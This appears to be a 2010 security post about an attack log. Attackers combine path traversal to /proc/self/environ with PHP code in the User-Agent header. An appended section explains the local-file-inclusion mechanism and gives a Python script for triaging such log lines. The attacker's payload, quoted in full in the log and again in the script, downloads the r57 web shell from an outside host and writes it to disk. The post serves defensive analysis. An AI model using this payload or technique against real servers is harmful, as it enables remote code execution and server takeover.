PHP in the user agent (attacking log analysis tools?)
2010-03-16 11:05
Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this:
a.b.229.82 - - [19/Jan/2010:22:43:39 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3820 "-" "<? echo '_rce_';echo php_uname();echo '_rce_';
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://websalesusa.com/ken');
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$cont=curl_exec($ch);
curl_close($ch);
$fh=fopen('doc.php', 'w');
fwrite($fh, $cont);
fclose($fh); ?>"
So, inside the user agent it is starting a PHP script that tries to download the file http://websalesusa.com/ken, which is the r57shell.php.
My guess is that it is trying to exploit a web stats or log analysis tool (like webalizer, google analytics, ossec, etc), but I couldn't find which one is vulnerable to that. Any ideas?
**this is what the r57shell looks like: http://sucuri.net/?page=tools&title=blacklist&seeall=1&detail=eadbf8dc38276dba3df4d6db9608db74
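Added example, not part of the original post. The request in the log is the classic local-file-inclusion path: index.php includes whatever the page= parameter names, the traversal lands on /proc/self/environ, and when PHP runs as a CGI/FastCGI worker that file carries the request's User-Agent header as HTTP_USER_AGENT, so include() executes the `<? ... ?>` block from the header. No stats or log-analysis tool has to be involved. The script below triages such lines and shows why the header is where the code goes. It assumes the Apache combined log format; SAMPLE_LOG is constructed (the post's request reflowed onto one line, plus a made-up benign request), and the environ simulation assumes a CGI/FastCGI deployment that exports request headers as HTTP_* variables (under mod_php the httpd environment does not carry them, and the trick fails).

```python
"""Triage of /proc/self/environ user-agent injection in Apache access logs.

Added example, not code from the original post. SAMPLE_LOG is constructed:
the first line is the post's own request reflowed onto one line, the second
is a made-up benign request for contrast. The environ simulation assumes
PHP runs as a CGI/FastCGI worker whose process environment carries the
request headers as HTTP_* variables (the deployment the trick relies on).
"""
import re
from urllib.parse import unquote

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
ENVIRON_RE = re.compile(r"/proc/self/environ", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?:php\b)?.*?\?>", re.DOTALL | re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")

# The post's user agent, split across source lines on statement boundaries.
PAYLOAD_UA = (
    "<? echo '_rce_';echo php_uname();echo '_rce_';$ch=curl_init();"
    "curl_setopt($ch, CURLOPT_URL, 'http://websalesusa.com/ken');"
    "curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);curl_setopt($ch, CURLOPT_TIMEOUT, 15);"
    "curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$cont=curl_exec($ch);curl_close($ch);"
    "$fh=fopen('doc.php', 'w');fwrite($fh, $cont);fclose($fh); ?>"
)
TRAVERSAL = "../" * 27 + "proc/self/environ"  # depth is arbitrary, as in the post

SAMPLE_LOG = [  # constructed sample input
    f'a.b.229.82 - - [19/Jan/2010:22:43:39 -0700] "GET /index.php?page={TRAVERSAL} HTTP/1.1" '
    f'200 3820 "-" "{PAYLOAD_UA}"',
    '203.0.113.7 - - [19/Jan/2010:22:44:01 -0700] "GET /index.php?page=about HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.5"',
]


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    parts = entry.pop("request").split(" ")
    entry["method"] = parts[0]
    entry["path"] = parts[1] if len(parts) > 1 else ""
    return entry


def indicators(entry):
    """Names of the indicators an entry trips, in a fixed order."""
    path = unquote(entry["path"])  # decode %2e%2e%2f style encoding first
    hits = []
    if TRAVERSAL_RE.search(path):
        hits.append("path-traversal")
    if ENVIRON_RE.search(path):
        hits.append("proc-self-environ")
    if PHP_TAG_RE.search(entry["ua"]):
        hits.append("php-in-user-agent")
    return hits


def triage(lines):
    """Flag entries and pull the second-stage download URLs out of the UA."""
    report = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        report.append({
            "ip": entry["ip"],
            "path": entry["path"],
            "indicators": indicators(entry),
            "second_stage": URL_RE.findall(entry["ua"]),
        })
    return report


def cgi_environ_blob(method, path, headers):
    """What /proc/self/environ of a CGI/FastCGI PHP worker contains while it
    serves this request: NUL-separated KEY=VALUE pairs, headers as HTTP_*."""
    env = {"REQUEST_METHOD": method, "REQUEST_URI": path}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return b"".join(f"{k}={v}\0".encode() for k, v in env.items())


def php_segments(blob):
    """The parts PHP's include() would execute from that blob: only the text
    inside <? ... ?>; everything else is echoed back to the client verbatim."""
    return PHP_TAG_RE.findall(blob.decode("latin-1"))


if __name__ == "__main__":
    for item in triage(SAMPLE_LOG):
        print(item["ip"], item["indicators"], item["second_stage"])
    blob = cgi_environ_blob("GET", "/index.php?page=" + TRAVERSAL, {"User-Agent": PAYLOAD_UA})
    print(php_segments(blob)[0][:60] + "...")
```

Running it over a real access log (`triage(open("access.log"))`) gives you the offending source IPs and the URLs to fetch for analysis; the fix on the application side is to stop handing `page=` to include() unfiltered (an allowlist of page names), not to patch any log tool.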